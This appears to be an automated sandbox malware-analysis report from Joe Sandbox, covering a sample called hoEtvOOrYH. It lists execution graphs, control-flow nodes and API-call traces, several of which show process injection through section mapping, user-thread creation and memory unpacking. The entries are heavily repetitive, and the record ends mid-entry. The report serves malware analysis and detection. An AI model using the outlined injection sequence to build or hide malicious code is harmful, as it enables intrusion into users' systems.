                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:22.5%
                                                                                                                                                                                  Signature Coverage:45%
                                                                                                                                                                                  Total number of Nodes:129
                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                  execution_graph 5664 40310d 5665 403250 5664->5665 5666 403137 5664->5666 5666->5665 5667 4031f2 RtlCreateUserThread NtTerminateProcess 5666->5667 5667->5665 5766 401a12 5767 401a20 5766->5767 5768 401a56 Sleep 5767->5768 5769 401a69 5768->5769 5770 401630 7 API calls 5769->5770 5771 401a7a 5769->5771 5770->5771 5668 8ad2d5 5671 8ad2e4 5668->5671 5672 8ad2f3 5671->5672 5675 8ada84 5672->5675 5681 8ada9f 5675->5681 5676 8adaa8 CreateToolhelp32Snapshot 5677 8adac4 Module32First 5676->5677 5676->5681 5678 8adad3 5677->5678 5680 8ad2e3 5677->5680 5682 8ad743 5678->5682 5681->5676 5681->5677 5683 8ad76e 5682->5683 5684 8ad7b7 5683->5684 5685 8ad77f VirtualAlloc 5683->5685 5684->5684 5685->5684 5838 41e7e0 5839 41e7ea __cfltcvt_init 5838->5839 5842 41f354 GetModuleHandleA 5839->5842 5841 41e7ef __setdefaultprecision 5843 41f363 GetProcAddress 5842->5843 5844 41f316 5842->5844 5843->5844 5844->5841 5784 401a22 5785 401a25 5784->5785 5786 401a56 Sleep 5784->5786 5785->5786 5787 401a69 5786->5787 5788 401630 7 API calls 5787->5788 5789 401a7a 5787->5789 5788->5789 5686 88092b GetPEB 5687 880972 5686->5687 5826 402ea4 5828 402ea5 5826->5828 5827 401a06 8 API calls 5829 403053 5827->5829 5828->5827 5828->5829 5574 41e770 5577 41e3c0 5574->5577 5576 41e775 5578 41e3d0 5577->5578 5579 41e474 GetDateFormatA 5578->5579 5580 41e4b3 5578->5580 5579->5578 5581 41e581 5580->5581 5582 41e4c2 7 API calls 5580->5582 5583 41e636 LocalAlloc 5581->5583 5584 41e58e InterlockedDecrement GetCommandLineW ReadProcessMemory GetAtomNameW SearchPathA 5581->5584 5597 41e54e 5582->5597 5585 41e658 5583->5585 5586 41e5d8 SetDefaultCommConfigA GetConsoleAliasW UnhandledExceptionFilter 5584->5586 5598 41e160 LoadLibraryW 5585->5598 5589 41e612 5586->5589 5590 41e609 GetBitmapBits 5586->5590 5588 41e686 5599 41e020 GetModuleHandleW GetProcAddress VirtualProtect 5588->5599 5592 41e624 5589->5592 5593 41e61b OpenFileMappingW 5589->5593 5590->5589 5592->5583 5593->5592 5594 41e68b 5600 41e330 5594->5600 5596 41e690 5596->5576 5597->5581 5598->5588 5599->5594 5609 41e230 5600->5609 5603 41e365 GetEnvironmentStringsW FindFirstVolumeA GetShortPathNameA 5604 41e387 5603->5604 5612 41e280 5604->5612 5607 41e3a6 5607->5596 5608 41e39e DeleteVolumeMountPointA 5608->5607 5610 41e241 GetStartupInfoW CreateProcessA 5609->5610 5611 41e263 5609->5611 5610->5611 5611->5603 5611->5604 5614 41e2a3 5612->5614 5616 41e2fc 5612->5616 5615 41e2df GetNumaHighestNodeNumber GetComputerNameW 5614->5615 5614->5616 5617 41e270 5614->5617 5615->5614 5616->5607 5616->5608 5620 41e1f0 5617->5620 5621 41e219 5620->5621 5622 41e20c PulseEvent 5620->5622 5621->5614 5622->5621 5623 88003c 5624 880049 5623->5624 5636 880e0f SetErrorMode SetErrorMode 5624->5636 5629 880265 5630 8802ce VirtualProtect 5629->5630 5632 88030b 5630->5632 5631 880439 VirtualFree 5635 8804be LoadLibraryA 5631->5635 5632->5631 5634 8808c7 5635->5634 5637 880223 5636->5637 5638 880d90 5637->5638 5639 880dad 5638->5639 5640 880dbb GetPEB 5639->5640 5641 880238 VirtualAlloc 5639->5641 5640->5641 5641->5629 5642 402fb6 5644 402fbf 5642->5644 5645 403053 5644->5645 5646 401a06 5644->5646 5647 401a14 5646->5647 5648 401a56 Sleep 5647->5648 5649 401a69 5648->5649 5651 401a7a 5649->5651 5652 401630 5649->5652 5651->5645 5653 40163f 5652->5653 5654 4016e2 NtDuplicateObject 5653->5654 5663 4017fe 5653->5663 5655 4016ff NtCreateSection 5654->5655 5654->5663 5656 401725 NtMapViewOfSection 5655->5656 5657 40177f NtCreateSection 5655->5657 5656->5657 5658 401748 NtMapViewOfSection 5656->5658 5659 4017ab 5657->5659 5657->5663 5658->5657 5660 401766 5658->5660 5661 4017b5 NtMapViewOfSection 5659->5661 5659->5663 5660->5657 5662 4017dc NtMapViewOfSection 5661->5662 5661->5663 5662->5663 5663->5651 5802 402e3b 5803 402e48 5802->5803 5805 402d9e 5802->5805 5804 401a06 8 API calls 5803->5804 5803->5805 5804->5805 5806 40163b 5807 401642 5806->5807 5808 4017fe 5807->5808 5809 4016e2 NtDuplicateObject 5807->5809 5809->5808 5810 4016ff NtCreateSection 5809->5810 5811 401725 NtMapViewOfSection 5810->5811 5812 40177f NtCreateSection 5810->5812 5811->5812 5813 401748 NtMapViewOfSection 5811->5813 5812->5808 5814 4017ab 5812->5814 5813->5812 5815 401766 5813->5815 5814->5808 5816 4017b5 NtMapViewOfSection 5814->5816 5815->5812 5816->5808 5817 4017dc NtMapViewOfSection 5816->5817 5817->5808

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0041E3C0 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 293timeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 41e3c0-41e3f4 2 41e3f7-41e3fc 0->2 3 41e404-41e40a 2->3 4 41e3fe 2->4 5 41e418-41e41e 3->5 6 41e40c-41e412 3->6 4->3 5->2 7 41e420-41e42e 5->7 6->5 8 41e430-41e436 7->8 9 41e442-41e448 8->9 10 41e438-41e43d 8->10 11 41e454-41e45b 9->11 12 41e44a-41e44e 9->12 10->9 11->8 13 41e45d-41e46b 11->13 12->11 15 41e470-41e4a8 GetDateFormatA 13->15 18 41e4b3-41e4bc 15->18 19 41e4aa-41e4b1 15->19 20 41e581-41e588 18->20 21 41e4c2-41e57e FoldStringW BuildCommDCBW GetTimeFormatW CancelDeviceWakeupRequest SetFileAttributesA UnregisterWaitEx SetLocaleInfoA 18->21 19->15 19->18 22 41e636-41e656 LocalAlloc 20->22 23 41e58e-41e607 InterlockedDecrement GetCommandLineW ReadProcessMemory GetAtomNameW SearchPathA SetDefaultCommConfigA GetConsoleAliasW UnhandledExceptionFilter 20->23 21->20 25 41e681-41e686 call 41e160 call 41e020 22->25 26 41e658-41e65e 22->26 31 41e612-41e619 23->31 32 41e609-41e60c GetBitmapBits 23->32 39 41e68b-41e69e call 41e330 25->39 28 41e660-41e670 26->28 34 41e672 28->34 35 41e67c-41e67f 28->35 37 41e624-41e633 31->37 38 41e61b-41e61e OpenFileMappingW 31->38 32->31 34->35 35->25 35->28 37->22 38->37 45 41e6a0-41e6a7 39->45 47 41e6a9 45->47 48 41e6ad-41e6b3 45->48 47->48 50 41e6b5 call 41e010 48->50 51 41e6ba-41e6c4 48->51 50->51 54 41e6c6-41e6cc 51->54 55 41e6cf-41e6d6 51->55 54->55 55->45 56 41e6d8-41e6e8 55->56 57 41e6f0-41e700 56->57 59 41e702-41e71c 57->59 60 41e71f-41e722 57->60 59->60 60->57 61 41e724-41e730 60->61 62 41e732-41e745 61->62 65 41e751-41e758 62->65 66 41e747-41e74f 62->66 65->62 67 41e75a-41e76e 65->67 66->65 66->67
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0041E49C
                                                                                                                                                                                  • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041E4D7
                                                                                                                                                                                  • BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041E4DF
                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0041E50D
                                                                                                                                                                                  • CancelDeviceWakeupRequest.KERNEL32(?), ref: 0041E518
                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00423368,00000000), ref: 0041E524
                                                                                                                                                                                  • UnregisterWaitEx.KERNEL32(?,00000000), ref: 0041E534
                                                                                                                                                                                  • SetLocaleInfoA.KERNEL32(00000000,00000000,00423370), ref: 0041E541
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731971792.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_411000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Format$AttributesBuildCancelCommDateDeviceFileFoldInfoLocaleRequestStringTimeUnregisterWaitWakeup
                                                                                                                                                                                  • String ID: F#
                                                                                                                                                                                  • API String ID: 4284779335-3765767533
                                                                                                                                                                                  • Opcode ID: 93cef7cba12cfc1e678a0af51042d9bce38c9d9d666f86ca22bf1549905f9b30
                                                                                                                                                                                  • Instruction ID: 58b4ca8a1ffd6a5f83b67aefe5396388f55c0061424afe5d5ceb088499a92ad9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 93cef7cba12cfc1e678a0af51042d9bce38c9d9d666f86ca22bf1549905f9b30
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96A1B2B6904300AFD320EF65DC85DAB77ACEB88315F80493EFA4692251D7789C45CB6E
                                                                                                                                                                                  Function 00401630 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 154 401630-40164b 158 401661 154->158 159 401652-40165d 154->159 158->159 160 401664-40168c call 4012c3 158->160 159->160 166 401691-401696 160->166 167 40168e 160->167 169 4019b4-4019bc 166->169 170 40169c-4016ad 166->170 167->166 169->166 175 4019c1-401a03 call 4012c3 169->175 173 4019b2 170->173 174 4016b3-4016dc 170->174 173->175 174->173 182 4016e2-4016f9 NtDuplicateObject 174->182 182->173 184 4016ff-401723 NtCreateSection 182->184 186 401725-401746 NtMapViewOfSection 184->186 187 40177f-4017a5 NtCreateSection 184->187 186->187 189 401748-401764 NtMapViewOfSection 186->189 187->173 190 4017ab-4017af 187->190 189->187 192 401766-40177c 189->192 190->173 194 4017b5-4017d6 NtMapViewOfSection 190->194 192->187 194->173 196 4017dc-4017f8 NtMapViewOfSection 194->196 196->173 197 4017fe call 401803 196->197
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: 183e64851d44db5460637f8e576f2d0f1b668b3fa3db5c1b7421a1c496617433
                                                                                                                                                                                  • Instruction ID: 7baa5f5768b34f369cd08a138b2b2447226c18c9e38af5e8fdc96bb499f212bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 183e64851d44db5460637f8e576f2d0f1b668b3fa3db5c1b7421a1c496617433
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD6171B0904204FBEB208F91CC89FAF7BB8FF81710F10452AF912BA1E4D6759941DB65
                                                                                                                                                                                  Function 0040163B Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 201 40163b-40164b 204 401661 201->204 205 401652-40165d 201->205 204->205 206 401664-40168c call 4012c3 204->206 205->206 212 401691-401696 206->212 213 40168e 206->213 215 4019b4-4019bc 212->215 216 40169c-4016ad 212->216 213->212 215->212 221 4019c1-401a03 call 4012c3 215->221 219 4019b2 216->219 220 4016b3-4016dc 216->220 219->221 220->219 228 4016e2-4016f9 NtDuplicateObject 220->228 228->219 230 4016ff-401723 NtCreateSection 228->230 232 401725-401746 NtMapViewOfSection 230->232 233 40177f-4017a5 NtCreateSection 230->233 232->233 235 401748-401764 NtMapViewOfSection 232->235 233->219 236 4017ab-4017af 233->236 235->233 238 401766-40177c 235->238 236->219 240 4017b5-4017d6 NtMapViewOfSection 236->240 238->233 240->219 242 4017dc-4017f8 NtMapViewOfSection 240->242 242->219 243 4017fe call 401803 242->243
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1652636561-0
                                                                                                                                                                                  • Opcode ID: cefcec3b4dfc0ac1b79d81610da9693edaefe17fb3e60f5b4fda00af43e12393
                                                                                                                                                                                  • Instruction ID: 5360d2f8fac9f0201fb143e2250a685fe16029abf29177764b1b7c662286b80c
                                                                                                                                                                                  • Opcode Fuzzy Hash: cefcec3b4dfc0ac1b79d81610da9693edaefe17fb3e60f5b4fda00af43e12393
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE514AB1900205BFEB208F91CC89FAF7BB8FF85700F14456AFA11BA2E5D6759941CB24
                                                                                                                                                                                  Function 00401666 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 247 401666-401668 248 40166b 247->248 249 40164f-401676 247->249 251 40166c-40168c call 4012c3 248->251 249->251 257 401691-401696 251->257 258 40168e 251->258 260 4019b4-4019bc 257->260 261 40169c-4016ad 257->261 258->257 260->257 266 4019c1-401a03 call 4012c3 260->266 264 4019b2 261->264 265 4016b3-4016dc 261->265 264->266 265->264 273 4016e2-4016f9 NtDuplicateObject 265->273 273->264 275 4016ff-401723 NtCreateSection 273->275 277 401725-401746 NtMapViewOfSection 275->277 278 40177f-4017a5 NtCreateSection 275->278 277->278 280 401748-401764 NtMapViewOfSection 277->280 278->264 281 4017ab-4017af 278->281 280->278 283 401766-40177c 280->283 281->264 285 4017b5-4017d6 NtMapViewOfSection 281->285 283->278 285->264 287 4017dc-4017f8 NtMapViewOfSection 285->287 287->264 288 4017fe call 401803 287->288
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1652636561-0
                                                                                                                                                                                  • Opcode ID: 6a5a12e5199d7872be29d194e1bd71eececbcf8f897f93194828f5f612321f2e
                                                                                                                                                                                  • Instruction ID: a6ff109548181b59d63890122cf59ee8a8e7851f5ea650de0760a669d67658a3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a5a12e5199d7872be29d194e1bd71eececbcf8f897f93194828f5f612321f2e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 895129B4900205BFEB208F91CC89FAF7BB8FF85B10F104569FA11AA2E5D6759941CB64
                                                                                                                                                                                  Function 00401647 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 292 401647-40168c call 4012c3 301 401691-401696 292->301 302 40168e 292->302 304 4019b4-4019bc 301->304 305 40169c-4016ad 301->305 302->301 304->301 310 4019c1-401a03 call 4012c3 304->310 308 4019b2 305->308 309 4016b3-4016dc 305->309 308->310 309->308 317 4016e2-4016f9 NtDuplicateObject 309->317 317->308 319 4016ff-401723 NtCreateSection 317->319 321 401725-401746 NtMapViewOfSection 319->321 322 40177f-4017a5 NtCreateSection 319->322 321->322 324 401748-401764 NtMapViewOfSection 321->324 322->308 325 4017ab-4017af 322->325 324->322 327 401766-40177c 324->327 325->308 329 4017b5-4017d6 NtMapViewOfSection 325->329 327->322 329->308 331 4017dc-4017f8 NtMapViewOfSection 329->331 331->308 332 4017fe call 401803 331->332
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: d8106e4bc7ca673257447c9282689d7b3e0364b5c7f46d4caad185d9f9525db9
                                                                                                                                                                                  • Instruction ID: 13265af8c753d5296a068bec70926f9e91cf6f155eb2a251ba93df0398a9b2e3
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8106e4bc7ca673257447c9282689d7b3e0364b5c7f46d4caad185d9f9525db9
                                                                                                                                                                                  • Instruction Fuzzy Hash: F6513BB5900205BFEB208F91CC89FEF7BB8FF85B10F104119F911BA2A4D6759941CB64
                                                                                                                                                                                  Function 00401660 Relevance: 10.7, APIs: 7, Instructions: 169nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 336 401660 337 401652-40165d 336->337 338 401664-40168c call 4012c3 336->338 337->338 344 401691-401696 338->344 345 40168e 338->345 347 4019b4-4019bc 344->347 348 40169c-4016ad 344->348 345->344 347->344 353 4019c1-401a03 call 4012c3 347->353 351 4019b2 348->351 352 4016b3-4016dc 348->352 351->353 352->351 360 4016e2-4016f9 NtDuplicateObject 352->360 360->351 362 4016ff-401723 NtCreateSection 360->362 364 401725-401746 NtMapViewOfSection 362->364 365 40177f-4017a5 NtCreateSection 362->365 364->365 367 401748-401764 NtMapViewOfSection 364->367 365->351 368 4017ab-4017af 365->368 367->365 370 401766-40177c 367->370 368->351 372 4017b5-4017d6 NtMapViewOfSection 368->372 370->365 372->351 374 4017dc-4017f8 NtMapViewOfSection 372->374 374->351 375 4017fe call 401803 374->375
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: e599f6710e28ba0f3f5ec0135dce1092a84c4915237567347f01b0f8a4c4c763
                                                                                                                                                                                  • Instruction ID: 88dcf12b86acca9d5ca78fae7b39ee59537206c200d96b006889814fd57da8f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: e599f6710e28ba0f3f5ec0135dce1092a84c4915237567347f01b0f8a4c4c763
                                                                                                                                                                                  • Instruction Fuzzy Hash: 12512AB0900205BFEB208F91CC89FAF7BB8FF85B10F104129FA11BA2E5D6759941CB64
                                                                                                                                                                                  Function 00401663 Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 379 401663-40168c call 4012c3 386 401691-401696 379->386 387 40168e 379->387 389 4019b4-4019bc 386->389 390 40169c-4016ad 386->390 387->386 389->386 395 4019c1-401a03 call 4012c3 389->395 393 4019b2 390->393 394 4016b3-4016dc 390->394 393->395 394->393 402 4016e2-4016f9 NtDuplicateObject 394->402 402->393 404 4016ff-401723 NtCreateSection 402->404 406 401725-401746 NtMapViewOfSection 404->406 407 40177f-4017a5 NtCreateSection 404->407 406->407 409 401748-401764 NtMapViewOfSection 406->409 407->393 410 4017ab-4017af 407->410 409->407 412 401766-40177c 409->412 410->393 414 4017b5-4017d6 NtMapViewOfSection 410->414 412->407 414->393 416 4017dc-4017f8 NtMapViewOfSection 414->416 416->393 417 4017fe call 401803 416->417
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: 2089da846d8ed52526ea3fb0d68e445529b89086c2a436fa3bc4dd68b40d8f3a
                                                                                                                                                                                  • Instruction ID: 9dfb7286379cb5b978975c8e53e5cfa9d010df6993f6f88681d8ce4a50fb4c8e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2089da846d8ed52526ea3fb0d68e445529b89086c2a436fa3bc4dd68b40d8f3a
                                                                                                                                                                                  • Instruction Fuzzy Hash: B851FAB5900249BFEB208F91CC89FAF7BB8FF85B10F104159FA11BA2A5D6749941CB64
                                                                                                                                                                                  Function 00401674 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 421 401674-40168c call 4012c3 427 401691-401696 421->427 428 40168e 421->428 430 4019b4-4019bc 427->430 431 40169c-4016ad 427->431 428->427 430->427 436 4019c1-401a03 call 4012c3 430->436 434 4019b2 431->434 435 4016b3-4016dc 431->435 434->436 435->434 443 4016e2-4016f9 NtDuplicateObject 435->443 443->434 445 4016ff-401723 NtCreateSection 443->445 447 401725-401746 NtMapViewOfSection 445->447 448 40177f-4017a5 NtCreateSection 445->448 447->448 450 401748-401764 NtMapViewOfSection 447->450 448->434 451 4017ab-4017af 448->451 450->448 453 401766-40177c 450->453 451->434 455 4017b5-4017d6 NtMapViewOfSection 451->455 453->448 455->434 457 4017dc-4017f8 NtMapViewOfSection 455->457 457->434 458 4017fe call 401803 457->458
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
